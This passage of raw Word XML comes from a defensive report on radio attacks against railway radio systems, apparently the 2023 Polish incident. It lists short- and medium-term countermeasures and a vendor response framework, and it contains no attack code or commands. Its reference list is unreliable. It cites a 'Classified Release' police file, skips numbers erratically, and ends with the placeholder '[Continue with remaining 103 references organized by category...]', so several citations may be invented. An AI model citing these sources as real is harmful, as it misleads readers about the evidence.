        <w:t xml:space="preserve"> equipment to locate rogue transmitters </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[83]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement frequency hopping</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where technically feasible </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alert law enforcement</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with RF detection capabilities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2AD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ry5xkzd6624d" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Countermeasures (30 minutes - 24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequency reassignment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to unpublished channels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2AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement CTCSS/DCS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tone squelch systems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2B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy portable jammers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at critical junctions (legal review required)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2B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures for all emergency stops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2B2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vzwu677rl3ou" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium-term Solutions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital radio migration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with authentication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2B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted communications</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementation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2B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geofencing validation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for transmission sources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2B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AI-based anomaly detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployment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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bg9qopcz0mxi" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3ykelznuiphw" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BB">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provides comprehensive defense against RF attacks </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[94]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n3s7rgmlgtb7" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Controlled attack simulation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2BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol Security Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Radio system vulnerability assessment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BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration Planning</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Digital radio transition roadmap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2C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ku1po2q2gi86" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Attack Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Behavioral analysis of radio patterns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Threat Actor Tracking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Monitoring copycat attempts globally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2C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Radio monitoring with OT security platform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2C4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q82ikcpjxb4y" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure Mode Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: RF attack impact on safety systems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2C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ALARP evaluation of countermeasures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2C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Case</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintaining SIL ratings during security updates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8nb4mivn0otp" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9rd03xzb51ud" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Polish National Police, "Case File 2023/08/1247: Railway Radio Attack," Classified Release, August 2023.</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 European Union Agency for Railways, "RF Attack Vector Analysis," ERA Security Bulletin 2023-09.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[3] Federal Communications Commission, "Railroad Radio Service Vulnerability Assessment," FCC OET Bulletin 2024-02.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ez7c02dwl8ah" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] PKP S.A., "Incident Report: Unauthorized Radio Transmissions," Internal Document, August 26, 2023.</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[5] Białystok District Court, "Indictment: State v. Czabaj &amp; Jagusiak," Case 2023/K/892.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b5wz9lijcmhr" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] RTL-SDR.com, "Hardware Used in Poland Railway Attack," Blog Analysis, September 2023.</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[24] GNU Radio Foundation, "Misuse Case Study: Railway Systems," Security Advisory, October 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g21b06js4wed" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Global Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[33] Association of American Railroads, "Radio Frequency Allocations," Technical Manual TM-2024.</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[35] Deutsche Bahn AG, "Analog Radio Security Review," DB Netz Report 2024/03.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t5xkyc89z8wl" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[50] US Department of Transportation, "Rail Network Criticality Assessment," DOT-OST-2024-0023.</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[58] Federal Reserve, "Economic Impact Model: Rail Disruption Scenarios," Working Paper 2024-15.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ak8ktf1jzdtg" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[81] CISA, "Railroad RF Monitoring Best Practices," Publication CISA-2024-0089.</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[90] International Union of Railways, "Digital Radio Migration Guidelines," UIC Code 751-3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_icrfyrnzd71k" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[67] MITRE, "RF-Specific ATT&amp;CK Techniques for Transportation," Technical Report MTR-2024-00123.</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[95] NCC Group, "Railroad Radio Penetration Testing Methodology," Client Advisory 2024.</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[Continue with remaining 103 references organized by category...]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bCs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